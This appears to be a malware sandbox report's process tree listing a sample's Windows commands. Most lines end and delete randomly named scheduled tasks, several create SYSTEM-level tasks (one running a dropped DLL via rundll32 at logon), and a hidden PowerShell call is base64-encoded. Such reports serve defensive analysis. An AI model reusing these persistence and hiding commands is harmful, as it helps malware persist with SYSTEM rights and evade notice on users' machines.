C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JtXAmmmjhUPKgDhgNcr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JtXAmmmjhUPKgDhgNcr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nBvEvDWPBldxaKpKfqN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nBvEvDWPBldxaKpKfqN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jzhFTGrHTBEHdwhDlHk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jzhFTGrHTBEHdwhDlHk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DhjJYrdSzhVIWJoLuaT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DhjJYrdSzhVIWJoLuaT2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "EEmPqVqEkOrqytjIixi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "EEmPqVqEkOrqytjIixi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DuQhIaNDUkixqBSFQah"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DuQhIaNDUkixqBSFQah2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XOocscxzenxPQcbeNoc"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XOocscxzenxPQcbeNoc2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CpcpIyQZEHEGDGaVcoP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CpcpIyQZEHEGDGaVcoP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TEwqxUjyIqmpTYSBiqY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TEwqxUjyIqmpTYSBiqY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dcKGwvyalvyuxhUFuri"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dcKGwvyalvyuxhUFuri2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LjPBjCkxU\cbriGN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RqexYqdylWmHLyb" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ODelVPTMCGECKgw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ODelVPTMCGECKgw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ODelVPTMCGECKgw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ODelVPTMCGECKgw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NuQkbDOvmjzyikR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NuQkbDOvmjzyikR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NuQkbDOvmjzyikR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NuQkbDOvmjzyikR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PVbqEphBRhdhSar"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PVbqEphBRhdhSar"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PVbqEphBRhdhSar2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PVbqEphBRhdhSar2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rXnzilGmloByZja"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rXnzilGmloByZja"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rXnzilGmloByZja2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rXnzilGmloByZja2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OrQOZlNdkHouDfl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OrQOZlNdkHouDfl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OrQOZlNdkHouDfl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OrQOZlNdkHouDfl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MPBTKOKNGQXdpYB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MPBTKOKNGQXdpYB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MPBTKOKNGQXdpYB2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MPBTKOKNGQXdpYB2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oHFOlowMWYvVWRa"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oHFOlowMWYvVWRa"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oHFOlowMWYvVWRa2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oHFOlowMWYvVWRa2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZhEuxlviVGbffes"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZhEuxlviVGbffes"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZhEuxlviVGbffes2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZhEuxlviVGbffes2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BzuHQmwIdSJdkMh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BzuHQmwIdSJdkMh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BzuHQmwIdSJdkMh2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BzuHQmwIdSJdkMh2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BrpDRukwPjenXAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BrpDRukwPjenXAP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BrpDRukwPjenXAP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BrpDRukwPjenXAP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sgHQxILjtpUwkEl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sgHQxILjtpUwkEl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sgHQxILjtpUwkEl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sgHQxILjtpUwkEl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rOlVqeNcMNUSjbL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rOlVqeNcMNUSjbL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rOlVqeNcMNUSjbL2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rOlVqeNcMNUSjbL2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vzkuwrRCcPzOovd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vzkuwrRCcPzOovd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vzkuwrRCcPzOovd2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vzkuwrRCcPzOovd2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JciSvjuACFCpPuk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JciSvjuACFCpPuk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JciSvjuACFCpPuk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JciSvjuACFCpPuk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RvLAFMCfsYAmjBx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RvLAFMCfsYAmjBx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RvLAFMCfsYAmjBx2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RvLAFMCfsYAmjBx2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xnzNwjgxPIMAgxD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xnzNwjgxPIMAgxD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xnzNwjgxPIMAgxD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xnzNwjgxPIMAgxD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "upvCizsQstLVhTX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "upvCizsQstLVhTX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "upvCizsQstLVhTX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "upvCizsQstLVhTX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sebDCftpEoxQGwR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sebDCftpEoxQGwR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "sebDCftpEoxQGwR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "sebDCftpEoxQGwR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kGGYvMdxzKuBmUA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kGGYvMdxzKuBmUA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kGGYvMdxzKuBmUA2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kGGYvMdxzKuBmUA2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VlcqrMUnqCdtcYE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VlcqrMUnqCdtcYE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VlcqrMUnqCdtcYE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VlcqrMUnqCdtcYE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yyQridzVWXzzcT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yyQridzVWXzzcT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FCfOZWamfTDXrH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FCfOZWamfTDXrH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pvGIKDreVSBaRR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pvGIKDreVSBaRR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jIbkXIHNAklabT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jIbkXIHNAklabT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nfEzZvDJpGIxHg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nfEzZvDJpGIxHg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ExPuUBSIqiUvrE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ExPuUBSIqiUvrE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nGHNjHLpNVwfpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nGHNjHLpNVwfpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "szhqlLvvAtuMdL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "szhqlLvvAtuMdL"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UChhjnNtERVtch"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UChhjnNtERVtch"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SvPmLaFiyNhJEE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SvPmLaFiyNhJEE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XtUsujuJqCIjis"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XtUsujuJqCIjis"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "mmnKyFwKoxWldP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mmnKyFwKoxWldP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YIRiNcmpuGXKMp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YIRiNcmpuGXKMp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dOGQydlyhLHPZb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dOGQydlyhLHPZb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bUqXeDfXwDeSyh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bUqXeDfXwDeSyh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kFksENUvgeEftn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kFksENUvgeEftn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "WeIhAxgzFxFdin"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WeIhAxgzFxFdin"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pSvwJbqBxDXeSH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pSvwJbqBxDXeSH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "AWsjqmbGbjSzjt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AWsjqmbGbjSzjt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "WIZvCLhyiJeIYW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WIZvCLhyiJeIYW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hvhndarYUHapy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hvhndarYUHapy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hvhndarYUHapy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hvhndarYUHapy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vYnQEgzpFpMeU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vYnQEgzpFpMeU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vYnQEgzpFpMeU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vYnQEgzpFpMeU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eLcVqmXNBWwuu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eLcVqmXNBWwuu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eLcVqmXNBWwuu2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eLcVqmXNBWwuu2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZmZKbjdnaUYqy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZmZKbjdnaUYqy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZmZKbjdnaUYqy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZmZKbjdnaUYqy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pSdZUpBHWsjUN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pSdZUpBHWsjUN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pSdZUpBHWsjUN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pSdZUpBHWsjUN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BDTQSCAhuviSt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BDTQSCAhuviSt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BDTQSCAhuviSt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BDTQSCAhuviSt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bnDdviFrBdSHm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnDdviFrBdSHm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bnDdviFrBdSHm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnDdviFrBdSHm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oqzeCtSumDxKN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oqzeCtSumDxKN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oqzeCtSumDxKN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oqzeCtSumDxKN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oRWdzfOuEBFOt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oRWdzfOuEBFOt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oRWdzfOuEBFOt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oRWdzfOuEBFOt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SqVkWMCzQJLkq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SqVkWMCzQJLkq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SqVkWMCzQJLkq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SqVkWMCzQJLkq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pepCFjUQgLQiC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pepCFjUQgLQiC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pepCFjUQgLQiC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pepCFjUQgLQiC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "uHiXiVeYNhlEV"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uHiXiVeYNhlEV"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "uHiXiVeYNhlEV2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uHiXiVeYNhlEV2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzgsIWcHHmecE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzgsIWcHHmecE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XzgsIWcHHmecE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XzgsIWcHHmecE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YAjsxgSIQquBU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YAjsxgSIQquBU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YAjsxgSIQquBU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YAjsxgSIQquBU2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vnRCnXJDjFgly"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vnRCnXJDjFgly"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vnRCnXJDjFgly2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vnRCnXJDjFgly2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "URrITWkPVtIxr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "URrITWkPVtIxr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "URrITWkPVtIxr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "URrITWkPVtIxr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fvbPtJKIKiiYC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fvbPtJKIKiiYC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fvbPtJKIKiiYC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fvbPtJKIKiiYC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qFUWsypIjqyCl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qFUWsypIjqyCl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qFUWsypIjqyCl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qFUWsypIjqyCl2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dTnpxKxkbKsoZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dTnpxKxkbKsoZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dTnpxKxkbKsoZ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dTnpxKxkbKsoZ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iTtFzCTVRGxRt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iTtFzCTVRGxRt"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iTtFzCTVRGxRt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iTtFzCTVRGxRt2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RqexYqdylWmHLyb2" /F /xml "C:\Program Files (x86)\LjPBjCkxU\HNgTMFj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RqexYqdylWmHLyb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RqexYqdylWmHLyb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RcKzCxNzDspESg" /F /xml "C:\Program Files (x86)\EkAcBLsehYBU2\VNWMwgr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mYkAlnQzdfnWB2" /F /xml "C:\ProgramData\PtxASTBQXXYOENVB\gEpkQEa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FbVloGRvRXpHpvUoC2" /F /xml "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\iBwvWTy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dcKGwvyalvyuxhUFuri2" /F /xml "C:\Program Files (x86)\WEPOREuymMJJC\DycnJMJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 6442⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3820 -ip 38201⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
